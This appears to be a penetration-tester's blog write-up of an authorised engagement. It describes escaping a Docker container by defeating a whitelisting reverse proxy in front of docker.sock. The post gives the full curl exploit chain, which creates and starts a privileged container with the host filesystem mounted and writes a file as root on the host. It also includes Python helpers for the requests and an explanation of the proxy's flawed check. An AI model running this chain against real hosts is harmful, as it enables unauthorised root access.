Legend has it that before his death, Harry Houdini once said: “if it is truly possible for someone to return from the afterlife, I will”. Despite the fact that he was a great illusionist and escape artist, this last feat seems to have proved very hard, even for him. It is much simpler to escape from a container. A docker container, of course 🙂 … our topic for today.
The danger of exposing “docker.sock” to a docker
container is well known, and the security literature is full of
examples (one is here[1]) leading to container
escape and privilege escalation on the host machine. But
sometimes this is required (or even unavoidable) for legitimate
purposes, like creating other containers or pushing configuration
settings. While the docker security guidelines advise against
sharing the Docker UNIX socket inside a container, the project
developers do not give any advice on how to secure such
a configuration whenever it is needed for “good
reasons”. That is why so many companies that adopt docker
and deliver services based on it still suffer from this
problem today.
For example, last year one of our customers contracted a
security firm to check the robustness of their docker
infrastructure. One of the main findings was the file
“docker.sock” being mounted within some of their
containers, which of course was a sufficient condition to
compromise the entire host operating system. In the absence of a
strong solution coming from the community, our customer decided
to build its own. They created a reverse proxy in front of
the Docker UNIX socket file that would add
authentication/authorization and would prevent insecure
use of the Docker socket itself.
Then they asked us to test the new architecture. This is the story of how the sympathetic Red Timmy has managed to bypass it.
The architecture
Before moving forward, we must briefly explain the implementation we were asked to test; a picture should make the job easy enough.
In this architecture there are two UNIX socket files now:
- /var/run/docker.sock is not exposed within the docker containers anymore. It is readable and writable only by the “root” user and the “docker” group. As you already know, the docker engine uses it directly.
- /var/run/somethingelse.sock is instead the resource exposed within the docker containers. The file is created so that it is readable and writable only by an unprivileged user which is not part of the docker group. In this way the process creating it does not have sufficient access rights to read and write directly into “/var/run/docker.sock”. The docker engine remains the only one able to do that.
Then a reverse proxy, running as a privileged user, sits between
these two UNIX socket files. It reads requests from
“/var/run/somethingelse.sock” and determines whether
or not they must be forwarded to
“/var/run/docker.sock” based on a whitelist of
authorized values saved beforehand in a configuration file. For
example, a request could be let through only if it matches a
specific HTTP method (GET, POST, etc.), path (for
example “/containers/create”) and/or JSON body.
In the same way, the reverse proxy relays the replies from
“docker.sock” back to “somethingelse.sock”
as they arrive. At first glance the workflow looked
fine and flawless.
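To make the filtering step more concrete, here is a minimal Python sketch of a method-and-path whitelist. The rule format, the names Rule, WHITELIST and is_allowed, and the two example entries are assumptions made for illustration only; the customer's real configuration format is not reproduced in this post.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    method: str        # HTTP method the rule applies to, e.g. "POST"
    path_pattern: str  # regular expression that must match the whole path


# Hypothetical whitelist: these two entries are illustrative assumptions.
WHITELIST = [
    Rule("POST", r"/containers/create"),
    Rule("POST", r"/containers/[0-9a-f]+/start"),
]


def is_allowed(method: str, path: str) -> bool:
    """Return True if some rule matches both the method and the full path."""
    return any(
        rule.method == method.upper()
        and re.fullmatch(rule.path_pattern, path) is not None
        for rule in WHITELIST
    )
```

A proxy built along these lines would forward a request to “docker.sock” when is_allowed returns True and answer with “403 Forbidden” otherwise. Checking the JSON body needs additional rules on top of this.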
Let the dance begin
Ok, all clear. We have been provided with access to a docker container:
[root@dockerhost ~]# docker exec -it 7c4e2742becb bash <-- container command prompt
bash-4.4$
Also our handsome UNIX socket file is where it is supposed to be:
bash-4.4$ ls -al /var/run/somethingelse.sock
srw------- 1 unpriv root 0 Feb 13 11:31 somethingelse.sock
Now we must find a way to escape out of there. The first thing we try is the “old” trick documented in the report that our customer received from the security firm they had originally contracted:
bash-4.4$ curl -i -s --unix-socket /var/run/somethingelse.sock -X POST \
    -H 'Content-Type: application/json' --data-binary \
    '{"Hostname": "", "Domainname": "", "User": "",
      "AttachStdin": true, "AttachStdout": true, "AttachStderr": true,
      "Tty": true, "OpenStdin": true, "StdinOnce": true,
      "Entrypoint": "/bin/bash",
      "Image": "dockerint.company.com/xxx/imagename:1.0.0-SNAPSHOT",
      "Volumes": {"/hostos/": {}},
      "HostConfig": {"Binds": ["/:/hostos"], "Privileged": true}}' \
    http://localhost/containers/create
The main difference in our command is that instead of
establishing a communication channel with
“/var/run/docker.sock” (not mounted in the container)
we target “/var/run/somethingelse.sock” (which is
instead mounted in the container). All the hacking steps are
performed with curl. Specifically, as we are communicating with a
UNIX domain socket, the “--unix-socket
<filename>” option is used.
The curl command above is essentially the same (slightly extended) as the one given in the section “Create the container with the mounted volume” of this online tutorial[2], which the penetration tester had linked in his report. I strongly suggest reading that post before going ahead with this one if you are not familiar with the technique in general. In any case, below follows a short explanation of what we were trying to do with that command.
Basically, from inside the container we are in, we are trying to
create another container that, once started, will
have the root directory “/” of the
host operating system mounted under its
“/hostos/” folder. If that can be
done, it is game over. Just connecting to the new container and
launching the command “chroot /hostos” would provide
the attacker with full access to the host operating system and all
its files.
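For readers who would rather script these requests than type them into curl, the sketch below shows one way to send the same kind of POST over a UNIX domain socket using only the Python standard library. The class name UnixHTTPConnection and the helper post_json are our own illustrative names, not part of any Docker tooling, and this is not the code used during the engagement.

```python
import http.client
import socket


class UnixHTTPConnection(http.client.HTTPConnection):
    """HTTP connection that talks to a UNIX domain socket instead of TCP."""

    def __init__(self, socket_path: str, timeout: float = 10.0):
        # "localhost" only ends up in the Host header; no TCP connection is made.
        super().__init__("localhost", timeout=timeout)
        self.socket_path = socket_path

    def connect(self) -> None:
        # Replace the default TCP connect with an AF_UNIX stream socket.
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        sock.settimeout(self.timeout)
        sock.connect(self.socket_path)
        self.sock = sock


def post_json(socket_path: str, path: str, body: bytes):
    """POST a JSON body to `path` and return (status code, response body)."""
    conn = UnixHTTPConnection(socket_path)
    try:
        conn.request("POST", path, body=body,
                     headers={"Content-Type": "application/json"})
        response = conn.getresponse()
        return response.status, response.read()
    finally:
        conn.close()
```

Calling post_json("/var/run/somethingelse.sock", "/containers/create", payload) with the JSON document shown earlier as payload (encoded as bytes) would be the scripted counterpart of the curl command.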
In our case instead the reverse proxy replied with:
HTTP/1.1 403 Forbidden
Honestly it was expected. Something else had to be attempted.
Time for circumvention
After a bit of trial and error we understood that the strictest
check is performed on the value passed to “Binds”.
When we provide the string “/:/hostos”, trying to map
the filesystem “/” of the host into the
“/hostos” directory of the container, the request is
rejected because the specified string is not in the whitelist.
However we discovered, for example, that
“/dev/log:/dev/log” is an accepted value. It
means the reverse proxy allows us to create a container from inside
another container when that value is provided. Of course there is
nothing special about using “/dev/log” to bypass the
filter. But what if the strings “/:/hostos” and
“/dev/log:/dev/log” are both specified as part of the
same “Binds” parameter, like below?
bash-4.4$ curl -i -s --unix-socket /var/run/somethingelse.sock -X POST \
    -H 'Content-Type: application/json' --data-binary \
    '{"Hostname": "", "Domainname": "", "User": "",
      "AttachStdin": true, "AttachStdout": true, "AttachStderr": true,
      "Tty": true, "OpenStdin": true, "StdinOnce": true,
      "Entrypoint": "/bin/bash",
      "Image": "dockerint.company.com/xxx/imagename:1.0.0-SNAPSHOT",
      "Volumes": {"/hostos/": {}},
      "HostConfig": {"Binds": ["/:/hostos", "/dev/log:/dev/log"],
                     "Privileged": true}}' \
    http://localhost/containers/create
Unexpectedly, the reverse proxy replies with:
HTTP/1.1 201 Created
Api-Version: 1.39
Content-Length: 90
Content-Type: application/json
Date: Fri, 15 May 2020 08:19:58 GMT
Docker-Experimental: false
Ostype: linux
Server: Docker/18.09.11 (linux)
{"Id":"4fa6bfc84930[...]","Warnings":null}
So it means we are allowed to create a new container where the
root of the host filesystem is mounted into its
“/hostos” directory. To confirm that, we manually
started the newly created container from the host OS and then
accessed it. This was what we got…
[root@4fa6bfc84930 opt]# ls -al /hostos/
[...]
drwxr-xr-x. 102 root root 8192 May 6 09:08 etc
drwxr-xr-x. 6 root root 56 Feb 7 2018 home
drwxr-xr-x. 2 root root 6 Mar 10 2016 media
drwxr-xr-x. 2 root root 6 Mar 10 2016 mnt
drwxr-xr-x. 17 root root 4096 Mar 24 2017 nfs
drwxr-xr-x. 7 root root 106 Jan 7 2019 opt
dr-xr-xr-x. 375 root root 0 Nov 23 08:23 proc
dr-xr-x---. 8 root root 4096 May 14 13:51 root
drwxr-xr-x. 35 root root 1140 May 6 09:08 run
lrwxrwxrwx. 1 root root 8 Jan 18 2018 sbin -> usr/sbin
[...]
…meaning that from inside the container we have total control over the entire host OS filesystem, which is exactly what the reverse proxy implementation was attempting to prevent. Good, but how was that possible? Well, let’s have one more look at the relevant part of the request that made the trick possible:
"Binds": ["/:/hostos", "/dev/log:/dev/log"]
It seems that if just one of the strings given to the
“Binds” parameter is present in the whitelist, the
whole check is considered passed, regardless of the presence of
other values that are not defined in the whitelist
configuration. The logic of the reverse proxy was clearly
flawed.
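We never saw the source code of the reverse proxy, so the following Python sketch is only our guess at logic equivalent to the behaviour we observed, next to the stricter check one would expect. The names ALLOWED_BINDS, flawed_check and strict_check are hypothetical, and the whitelist contains only the one value we know was accepted.

```python
# Hypothetical whitelist holding the single bind value we know was accepted.
ALLOWED_BINDS = {"/dev/log:/dev/log"}


def flawed_check(binds):
    """Pass as soon as ONE requested bind is whitelisted (observed behaviour)."""
    return any(bind in ALLOWED_BINDS for bind in binds)


def strict_check(binds):
    """Pass only if EVERY requested bind is whitelisted."""
    return all(bind in ALLOWED_BINDS for bind in binds)
```

With the list ["/:/hostos", "/dev/log:/dev/log"], flawed_check lets the request through while strict_check rejects it; with ["/:/hostos"] alone both reject it, which matches the 403 we received at the first attempt. Note that strict_check accepts an empty list, which is harmless here because no host path is mounted in that case.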
Start the container just created
So from inside the current container we have managed to create a new one with full access to the host OS filesystem. But we have not executed anything in the host OS yet…and we are still confined within our unprivileged container.
bash-4.4$
Let’s try to get out of here. First of all let’s see if after its creation we can also start the container from the place where we are now:
curl -i -s --unix-socket /var/run/somethingelse.sock -X POST \
    -H 'Content-Type: application/json' \
    http://localhost/containers/4fa6bfc84930[...]/start
As indicated in the Docker API[3],
the endpoint to target this time is
“/containers/{ID}/start”, where ID is
the value the reverse proxy returned to us in reply to the previous
request. The reply we get is:
HTTP/1.1 204 No Content
Api-Version: 1.39
Date: Fri, 15 May 2020 08:20:34 GMT
Docker-Experimental: false
Ostype: linux
Server: Docker/18.09.11 (linux)
It means we are allowed to do that. So far, so good. Now the
highly privileged container is started and we want to execute a
command in there. We could for example create an exec instance[4]
and then start[5]
it to get the result back. Unfortunately the reverse proxy did not
let us through, because the endpoint
“/containers/{id}/exec” is not in the
whitelist:
HTTP/1.1 403 Forbidden
Ok, what if we use the docker API to attach[6] to the newly created privileged container, so as to send it input and read its output directly from the unprivileged one where we are confined now?
curl -i -s --unix-socket /var/run/somethingelse.sock -X POST \
    "http://localhost/containers/4fa6bfc84930/attach?logs=1&stream=1&stdin=true&stdout=true&stderr=true"
In this case the reply is encouraging…
HTTP/1.1 200 OK
Content-Type: application/vnd.docker.raw-stream
Date: Thu, 14 May 2020 16:05:09 GMT
Transfer-Encoding: chunked
…but for some reason we are dropped back to the shell of our unprivileged container:
bash-4.4$
Probably the reverse proxy does not handle this kind of request well, even though it is not explicitly prohibited in the whitelist configuration file. We clearly cannot abuse this mechanism.
Searching for something else
What other options are we left with in order to execute a
command in the started container? Unfortunately not many and
everything we tried was blocked or did not work. Let’s analyze what
we are allowed to do so far. The best achievement is the ability to
bypass the reverse proxy’s whitelist and create a container. We
decided then to take a better look at the Docker API and stumbled
upon the parameter “Cmd[7]” of the
“/containers/create” endpoint.
This looks like a command run when the container is started. We decided to give it a try by creating a new container specifying that parameter:
curl -i -s --unix-socket /var/run/somethingelse.sock -X POST \
    -H 'Content-Type: application/json' --data-binary \
    '{"Hostname": "", "Domainname": "", "User": "",
      "AttachStdin": true, "AttachStdout": true, "AttachStderr": true,
      "Tty": true, "OpenStdin": true, "StdinOnce": true,
      "Entrypoint": "",
      "Cmd": "touch /hostos/root/marco_RT_was_here.txt",
      "Image": "dockerint.company.com/xxx/imagename:1.0.0-SNAPSHOT",
      "Volumes": {"/hostos/": {}},
      "HostConfig": {"Binds": ["/:/hostos", "/dev/log:/dev/log"],
                     "Privileged": true}}' \
    http://localhost/containers/create
Compared to the previously launched command:
- “Entrypoint” is now empty as we don’t need it.
- “Cmd” is set to the command we want to execute in the host OS, that is “touch /hostos/root/marco_RT_was_here.txt”.
- “Binds” is configured the same way as in the previous request in order to mount the root of the host OS into the “/hostos” directory of the newly created container.
As “/hostos” contains the full host filesystem
thanks to the whitelist bypass of the “Binds” parameter
seen before, the assumption is that this request will actually
create the file named “marco_RT_was_here.txt” in the
“/root” folder of the host with the permissions of the root user,
once the container is started.
After submitting our request, the reverse proxy replies with the
ID of the new container (abac34acc1003[...]). Time to
start it:
curl -i -s --unix-socket /var/run/somethingelse.sock -X POST \
    -H 'Content-Type: application/json' \
    http://localhost/containers/abac34acc1003[...]/start
We expected to see the file
“marco_RT_was_here.txt” created inside the
“/root” folder of the host OS, but we were wrong.
A quick look at the description of the “Cmd”
parameter was sufficient to reveal that the command must be passed
as an “Array of string”, which means our payload has to be
shaped like this:
["touch", "/hostos/root/marco_RT_was_here.txt"]
…and not as a single static string “touch
/hostos/root/marco_RT_was_here.txt”. Ok, let’s send the
request again:
curl -i -s --unix-socket /var/run/somethingelse.sock -X POST \
    -H 'Content-Type: application/json' --data-binary \
    '{"Hostname": "", "Domainname": "", "User": "",
      "AttachStdin": true, "AttachStdout": true, "AttachStderr": true,
      "Tty": true, "OpenStdin": true, "StdinOnce": true,
      "Entrypoint": "",
      "Cmd": ["touch", "/hostos/root/marco_RT_was_here.txt"],
      "Image": "dockerint.company.com/xxx/imagename:1.0.0-SNAPSHOT",
      "Volumes": {"/hostos/": {}},
      "HostConfig": {"Binds": ["/:/hostos", "/dev/log:/dev/log"],
                     "Privileged": true}}' \
    http://localhost/containers/create
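Hand-writing the JSON is where the string-versus-array mistake crept in. As a hedged illustration, the Python sketch below builds a reduced version of the payload and lets shlex split the command line into the array form that “Cmd” expects. The helper name build_create_payload is ours, and the payload deliberately keeps only a subset of the fields used in the request above.

```python
import json
import shlex


def build_create_payload(command_line, image, binds):
    """Serialize a reduced /containers/create body with "Cmd" as an array."""
    payload = {
        "Entrypoint": "",
        # shlex.split turns "touch /path" into ["touch", "/path"].
        "Cmd": shlex.split(command_line),
        "Image": image,
        "HostConfig": {"Binds": list(binds), "Privileged": True},
    }
    return json.dumps(payload)
```

Passing the command as a single shell-like string and splitting it in code keeps the request readable while still producing the array of strings that the API documentation asks for.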
The ID the reverse proxy returns is 21429c9550c5c.
Then, with that ID in our hands, the container is started for the
umpteenth time…
curl -i -s --unix-socket /var/run/somethingelse.sock -X POST \
    -H 'Content-Type: application/json' \
    http://localhost/containers/21429c9550c5c[...]/start
…and now things seem to work, as shown in the picture below:
This incontrovertibly demonstrates that the filesystem of the host machine is fully accessible from the container we are confined in, and that we can write files on the host OS as root. This can then be taken further in ways only limited by our imagination. From the host OS we could for example write a cronjob, launch a reverse shell, deploy a malicious privileged docker image with ssh port exposed, etc…
Wonderful! This concludes our post. Do not forget to follow us on twitter[8], github[9] and above all have a look at the Red Timmy Academy[10] page to find our latest courses and trainings.
References